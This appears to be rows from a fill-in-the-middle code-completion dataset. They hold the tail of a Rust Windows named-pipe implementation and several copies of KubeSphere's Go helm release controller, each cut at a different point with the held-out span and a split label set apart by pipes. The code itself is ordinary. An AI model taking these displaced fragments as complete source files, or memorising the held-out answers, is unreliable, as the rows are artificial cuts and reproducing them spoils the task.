// also just doing a best effort at selecting a unique name. If
// ERROR_ACCESS_DENIED is returned then it could mean that we
// accidentally conflicted with an already existing pipe, so we try
// again.
//
// Don't try again too much though as this could also perhaps be a
// legit error.
if handle == c::INVALID_HANDLE_VALUE {
let err = io::Error::last_os_error();
if tries < 10 &&
err.raw_os_error() == Some(c::ERROR_ACCESS_DENIED as i32) {
continue
}
return Err(err)
}
reader = Handle::new(handle);
break
}
// Connect to the named pipe we just created in write-only mode (also
// overlapped for async I/O below).
let mut opts = OpenOptions::new();
opts.write(true);
opts.read(false);
opts.share_mode(0);
opts.attributes(c::FILE_FLAG_OVERLAPPED);
let writer = File::open(Path::new(&name), &opts)?;
let writer = AnonPipe { inner: writer.into_handle() };
Ok((AnonPipe { inner: reader }, AnonPipe { inner: writer.into_handle() }))
}
}
impl AnonPipe {
pub fn handle(&self) -> &Handle |
pub fn into_handle(self) -> Handle { self.inner }
pub fn read(&self, buf: &mut [u8]) -> io::Result<usize> {
self.inner.read(buf)
}
pub fn read_to_end(&self, buf: &mut Vec<u8>) -> io::Result<usize> {
self.inner.read_to_end(buf)
}
pub fn write(&self, buf: &[u8]) -> io::Result<usize> {
self.inner.write(buf)
}
}
pub fn read2(p1: AnonPipe,
v1: &mut Vec<u8>,
p2: AnonPipe,
v2: &mut Vec<u8>) -> io::Result<()> {
let p1 = p1.into_handle();
let p2 = p2.into_handle();
let mut p1 = AsyncPipe::new(p1, v1)?;
let mut p2 = AsyncPipe::new(p2, v2)?;
let objs = [p1.event.raw(), p2.event.raw()];
// In a loop we wait for either pipe's scheduled read operation to complete.
// If the operation completes with 0 bytes, that means EOF was reached, in
// which case we just finish out the other pipe entirely.
//
// Note that overlapped I/O is in general super unsafe because we have to
// be careful to ensure that all pointers in play are valid for the entire
// duration of the I/O operation (where tons of operations can also fail).
// The destructor for `AsyncPipe` ends up taking care of most of this.
loop {
let res = unsafe {
c::WaitForMultipleObjects(2, objs.as_ptr(), c::FALSE, c::INFINITE)
};
if res == c::WAIT_OBJECT_0 {
if !p1.result()? || !p1.schedule_read()? {
return p2.finish()
}
} else if res == c::WAIT_OBJECT_0 + 1 {
if !p2.result()? || !p2.schedule_read()? {
return p1.finish()
}
} else {
return Err(io::Error::last_os_error())
}
}
}
struct AsyncPipe<'a> {
pipe: Handle,
event: Handle,
overlapped: Box<c::OVERLAPPED>, // needs a stable address
dst: &'a mut Vec<u8>,
state: State,
}
#[derive(PartialEq, Debug)]
enum State {
NotReading,
Reading,
Read(usize),
}
impl<'a> AsyncPipe<'a> {
fn new(pipe: Handle, dst: &'a mut Vec<u8>) -> io::Result<AsyncPipe<'a>> {
// Create an event which we'll use to coordinate our overlapped
// opreations, this event will be used in WaitForMultipleObjects
// and passed as part of the OVERLAPPED handle.
//
// Note that we do a somewhat clever thing here by flagging the
// event as being manually reset and setting it initially to the
// signaled state. This means that we'll naturally fall through the
// WaitForMultipleObjects call above for pipes created initially,
// and the only time an even will go back to "unset" will be once an
// I/O operation is successfully scheduled (what we want).
let event = Handle::new_event(true, true)?;
let mut overlapped: Box<c::OVERLAPPED> = unsafe {
Box::new(mem::zeroed())
};
overlapped.hEvent = event.raw();
Ok(AsyncPipe {
pipe: pipe,
overlapped: overlapped,
event: event,
dst: dst,
state: State::NotReading,
})
}
/// Executes an overlapped read operation.
///
/// Must not currently be reading, and returns whether the pipe is currently
/// at EOF or not. If the pipe is not at EOF then `result()` must be called
/// to complete the read later on (may block), but if the pipe is at EOF
/// then `result()` should not be called as it will just block forever.
fn schedule_read(&mut self) -> io::Result<bool> {
assert_eq!(self.state, State::NotReading);
let amt = unsafe {
let slice = slice_to_end(self.dst);
self.pipe.read_overlapped(slice, &mut *self.overlapped)?
};
// If this read finished immediately then our overlapped event will
// remain signaled (it was signaled coming in here) and we'll progress
// down to the method below.
//
// Otherwise the I/O operation is scheduled and the system set our event
// to not signaled, so we flag ourselves into the reading state and move
// on.
self.state = match amt {
Some(0) => return Ok(false),
Some(amt) => State::Read(amt),
None => State::Reading,
};
Ok(true)
}
/// Wait for the result of the overlapped operation previously executed.
///
/// Takes a parameter `wait` which indicates if this pipe is currently being
/// read whether the function should block waiting for the read to complete.
///
/// Return values:
///
/// * `true` - finished any pending read and the pipe is not at EOF (keep
/// going)
/// * `false` - finished any pending read and pipe is at EOF (stop issuing
/// reads)
fn result(&mut self) -> io::Result<bool> {
let amt = match self.state {
State::NotReading => return Ok(true),
State::Reading => {
self.pipe.overlapped_result(&mut *self.overlapped, true)?
}
State::Read(amt) => amt,
};
self.state = State::NotReading;
unsafe {
let len = self.dst.len();
self.dst.set_len(len + amt);
}
Ok(amt != 0)
}
/// Finishes out reading this pipe entirely.
///
/// Waits for any pending and schedule read, and then calls `read_to_end`
/// if necessary to read all the remaining information.
fn finish(&mut self) -> io::Result<()> {
while self.result()? && self.schedule_read()? {
// ...
}
Ok(())
}
}
impl<'a> Drop for AsyncPipe<'a> {
fn drop(&mut self) {
match self.state {
State::Reading => {}
_ => return,
}
// If we have a pending read operation, then we have to make sure that
// it's *done* before we actually drop this type. The kernel requires
// that the `OVERLAPPED` and buffer pointers are valid for the entire
// I/O operation.
//
// To do that, we call `CancelIo` to cancel any pending operation, and
// if that succeeds we wait for the overlapped result.
//
// If anything here fails, there's not really much we can do, so we leak
// the buffer/OVERLAPPED pointers to ensure we're at least memory safe.
if self.pipe.cancel_io().is_err() || self.result().is_err() {
let buf = mem::replace(self.dst, Vec::new());
let overlapped = Box::new(unsafe { mem::zeroed() });
let overlapped = mem::replace(&mut self.overlapped, overlapped);
mem::forget((buf, overlapped));
}
}
}
unsafe fn slice_to_end(v: &mut Vec<u8>) -> &mut [u8] {
if v.capacity() == 0 {
v.reserve(16);
}
if v.capacity() == v.len() {
v.reserve(1);
}
slice::from_raw_parts_mut(v.as_mut_ptr().offset(v.len() as isize),
v.capacity() - v.len())
}
| { &self.inner } | identifier_body |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileWorkspace reconciles a Workspace object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads that state of the cluster for a helmreleases object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then lets add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// Host cluster will self-healing, delete host cluster won't cause deletion of helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleting
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too much times, exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus})
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) | (rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If user deletes helmRelease first and then delete cluster immediately, this may cause helm resources leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
}
| uninstallHelmRelease | identifier_name |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileWorkspace reconciles a Workspace object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads that state of the cluster for a helmreleases object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
// For additional cleanup logic use finalizers.
return reconcile.Result{}, nil
}
// Error reading the object - requeue the request.
return reconcile.Result{}, err
}
if instance.Status.State == "" {
instance.Status.State = v1alpha1.HelmStatusCreating
instance.Status.LastUpdate = metav1.Now()
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
}
if instance.ObjectMeta.DeletionTimestamp.IsZero() {
// The object is not being deleted, so if it does not have our finalizer,
// then lets add the finalizer and update the object.
if !sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
clusterName := instance.GetRlsCluster()
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
// cluster not exists, delete the crd
klog.Warningf("cluster %s not found, delete the helm release %s/%s",
clusterName, instance.GetRlsNamespace(), instance.GetTrueName())
return reconcile.Result{}, r.Delete(context.TODO(), instance)
}
// Host cluster will self-healing, delete host cluster won't cause deletion of helm release
if !r.clusterClients.IsHostCluster(clusterInfo) {
// add owner References
instance.OwnerReferences = append(instance.OwnerReferences, metav1.OwnerReference{
APIVersion: clusterv1alpha1.SchemeGroupVersion.String(),
Kind: clusterv1alpha1.ResourceKindCluster,
Name: clusterInfo.Name,
UID: clusterInfo.UID,
})
}
}
instance.ObjectMeta.Finalizers = append(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer)
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
} else {
// The object is being deleting
if sliceutil.HasString(instance.ObjectMeta.Finalizers, HelmReleaseFinalizer) {
klog.V(3).Infof("helm uninstall %s/%s from host cluster", instance.GetRlsNamespace(), instance.Spec.Name)
err := r.uninstallHelmRelease(instance)
if err != nil {
return reconcile.Result{}, err
}
klog.V(3).Infof("remove helm release %s finalizer", instance.Name)
// remove finalizer
instance.ObjectMeta.Finalizers = sliceutil.RemoveString(instance.ObjectMeta.Finalizers, func(item string) bool {
if item == HelmReleaseFinalizer {
return true
}
return false
})
if err := r.Update(context.Background(), instance); err != nil {
return reconcile.Result{}, err
}
}
return reconcile.Result{}, nil
}
return r.reconcile(instance)
}
// Check the state of the instance then decide what to do.
func (r *ReconcileHelmRelease) reconcile(instance *v1alpha1.HelmRelease) (reconcile.Result, error) {
if instance.Status.State == v1alpha1.HelmStatusActive && instance.Status.Version == instance.Spec.Version {
// todo check release status
return reconcile.Result{}, nil
}
ft := failedTimes(instance.Status.DeployStatus)
if v1alpha1.HelmStatusFailed == instance.Status.State && ft > 0 {
// failed too much times, exponential backoff, max delay 180s
retryAfter := time.Duration(math.Min(math.Exp2(float64(ft)), 180)) * time.Second
var lastDeploy time.Time
if instance.Status.LastDeployed != nil {
lastDeploy = instance.Status.LastDeployed.Time
} else {
lastDeploy = instance.Status.LastUpdate.Time
}
if time.Now().Before(lastDeploy.Add(retryAfter)) {
return reconcile.Result{RequeueAfter: retryAfter}, nil
}
}
var err error
switch instance.Status.State {
case v1alpha1.HelmStatusDeleting:
// no operation
return reconcile.Result{}, nil
case v1alpha1.HelmStatusActive:
// Release used to be active, but instance.Status.Version not equal to instance.Spec.Version
instance.Status.State = v1alpha1.HelmStatusUpgrading
// Update the state first.
err = r.Status().Update(context.TODO(), instance)
return reconcile.Result{}, err
case v1alpha1.HelmStatusCreating:
// create new release
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusFailed:
err = r.createOrUpgradeHelmRelease(instance, false)
case v1alpha1.HelmStatusUpgrading:
// We can update the release now.
err = r.createOrUpgradeHelmRelease(instance, true)
case v1alpha1.HelmStatusRollbacking:
// TODO: rollback helm release
}
now := metav1.Now()
var deployStatus v1alpha1.HelmReleaseDeployStatus
if err != nil {
instance.Status.State = v1alpha1.HelmStatusFailed
instance.Status.Message = stringutils.ShortenString(err.Error(), v1alpha1.MsgLen)
deployStatus.Message = instance.Status.Message
deployStatus.State = v1alpha1.HelmStatusFailed
} else {
instance.Status.State = v1alpha1.StateActive
instance.Status.Message = ""
instance.Status.Version = instance.Spec.Version
deployStatus.State = v1alpha1.HelmStatusSuccessful
}
deployStatus.Time = now
instance.Status.LastUpdate = now
instance.Status.LastDeployed = &now
if len(instance.Status.DeployStatus) > 0 {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus}, instance.Status.DeployStatus...)
// At most ten records will be saved.
if len(instance.Status.DeployStatus) >= 10 {
instance.Status.DeployStatus = instance.Status.DeployStatus[:10:10]
}
} else {
instance.Status.DeployStatus = append([]v1alpha1.HelmReleaseDeployStatus{deployStatus})
}
err = r.Status().Update(context.TODO(), instance)
if err != nil {
return reconcile.Result{}, err
}
return reconcile.Result{}, nil
}
func failedTimes(status []v1alpha1.HelmReleaseDeployStatus) int {
count := 0
for i := range status {
if status[i].State == v1alpha1.HelmStatusFailed {
count += 1
}
}
return count
}
func (r *ReconcileHelmRelease) createOrUpgradeHelmRelease(rls *v1alpha1.HelmRelease, upgrade bool) error {
var chartData []byte
var err error
_, chartData, err = r.GetChartData(rls)
if err != nil {
return err
}
if len(chartData) == 0 {
klog.Errorf("empty chart data failed, release name %s, chart name: %s", rls.Name, rls.Spec.ChartName)
return ErrAppVersionDataIsEmpty
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
if r.MultiClusterEnable && clusterName != "" {
clusterConfig, err = r.clusterClients.GetClusterKubeconfig(clusterName)
if err != nil {
klog.Errorf("get cluster %s config failed", clusterConfig)
return err
}
}
// If clusterConfig is empty, this application will be installed in current host.
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name,
// We just add kubesphere.io/creator annotation now.
helmwrapper.SetAnnotations(map[string]string{constants.CreatorAnnotationKey: rls.GetCreator()}),
helmwrapper.SetMock(r.helmMock))
var res helmwrapper.HelmRes
if upgrade {
res, err = hw.Upgrade(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
} else {
res, err = hw.Install(rls.Spec.ChartName, string(chartData), string(rls.Spec.Values))
}
if err != nil {
return errors.New(res.Message)
}
return nil |
func (r *ReconcileHelmRelease) uninstallHelmRelease(rls *v1alpha1.HelmRelease) error {
if rls.Status.State != v1alpha1.HelmStatusDeleting {
rls.Status.State = v1alpha1.HelmStatusDeleting
rls.Status.LastUpdate = metav1.Now()
err := r.Status().Update(context.TODO(), rls)
if err != nil {
return err
}
}
clusterName := rls.GetRlsCluster()
var clusterConfig string
var err error
if r.MultiClusterEnable && clusterName != "" {
clusterInfo, err := r.clusterClients.Get(clusterName)
if err != nil {
klog.V(2).Infof("cluster %s was deleted, skip helm release uninstall", clusterName)
return nil
}
// If user deletes helmRelease first and then delete cluster immediately, this may cause helm resources leak.
if clusterInfo.DeletionTimestamp != nil {
klog.V(2).Infof("cluster %s is deleting, skip helm release uninstall", clusterName)
return nil
}
clusterConfig = string(clusterInfo.Spec.Connection.KubeConfig)
}
hw := helmwrapper.NewHelmWrapper(clusterConfig, rls.GetRlsNamespace(), rls.Spec.Name, helmwrapper.SetMock(r.helmMock))
res, err := hw.Uninstall()
if err != nil {
return errors.New(res.Message)
}
return nil
}
func (r *ReconcileHelmRelease) SetupWithManager(mgr ctrl.Manager) error {
r.Client = mgr.GetClient()
if r.KsFactory != nil && r.MultiClusterEnable {
r.clusterClients = clusterclient.NewClusterClient(r.KsFactory.Cluster().V1alpha1().Clusters())
}
return ctrl.NewControllerManagedBy(mgr).
For(&v1alpha1.HelmRelease{}).
Complete(r)
} | } | random_line_split |
helm_release_controller.go | /*
Copyright 2019 The KubeSphere Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package helmrelease
import (
"context"
"errors"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/tools/cache"
"k8s.io/client-go/tools/record"
"k8s.io/klog"
"kubesphere.io/kubesphere/pkg/apis/application/v1alpha1"
clusterv1alpha1 "kubesphere.io/kubesphere/pkg/apis/cluster/v1alpha1"
"kubesphere.io/kubesphere/pkg/client/informers/externalversions"
"kubesphere.io/kubesphere/pkg/constants"
"kubesphere.io/kubesphere/pkg/simple/client/openpitrix/helmwrapper"
"kubesphere.io/kubesphere/pkg/simple/client/s3"
"kubesphere.io/kubesphere/pkg/utils/clusterclient"
"kubesphere.io/kubesphere/pkg/utils/sliceutil"
"kubesphere.io/kubesphere/pkg/utils/stringutils"
"math"
ctrl "sigs.k8s.io/controller-runtime"
"sigs.k8s.io/controller-runtime/pkg/client"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
"time"
)
const (
HelmReleaseFinalizer = "helmrelease.application.kubesphere.io"
)
var (
ErrGetRepoFailed = errors.New("get repo failed")
ErrGetAppFailed = errors.New("get app failed")
ErrAppVersionDataIsEmpty = errors.New("app version data is empty")
ErrGetAppVersionFailed = errors.New("get app version failed")
ErrLoadChartFailed = errors.New("load chart failed")
ErrS3Config = errors.New("invalid s3 config")
ErrLoadChartFromStorageFailed = errors.New("load chart from storage failed")
)
var _ reconcile.Reconciler = &ReconcileHelmRelease{}
// ReconcileWorkspace reconciles a Workspace object
type ReconcileHelmRelease struct {
StorageClient s3.Interface
KsFactory externalversions.SharedInformerFactory
client.Client
recorder record.EventRecorder
// mock helm install && uninstall
helmMock bool
informer cache.SharedIndexInformer
clusterClients clusterclient.ClusterClients
MultiClusterEnable bool
}
//
// <==>upgrading===================
// | \
// creating===>active=====>deleting=>deleted |
// \ ^ / |
// \ | /======> /
// \=>failed<==========================
// Reconcile reads that state of the cluster for a helmreleases object and makes changes based on the state read
// and what is in the helmreleases.Spec
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases,verbs=get;list;watch;create;update;patch;delete
// +kubebuilder:rbac:groups=application.kubesphere.io,resources=helmreleases/status,verbs=get;update;patch
func (r *ReconcileHelmRelease) Reconcile(request reconcile.Request) (reconcile.Result, error) {
// Fetch the helmReleases instance
instance := &v1alpha1.HelmRelease{}
err := r.Get(context.TODO(), request.NamespacedName, instance)
if err != nil {
if apierrors.IsNotFound(err) {
// Object not found, return. Created objects are automatically garbage collected.
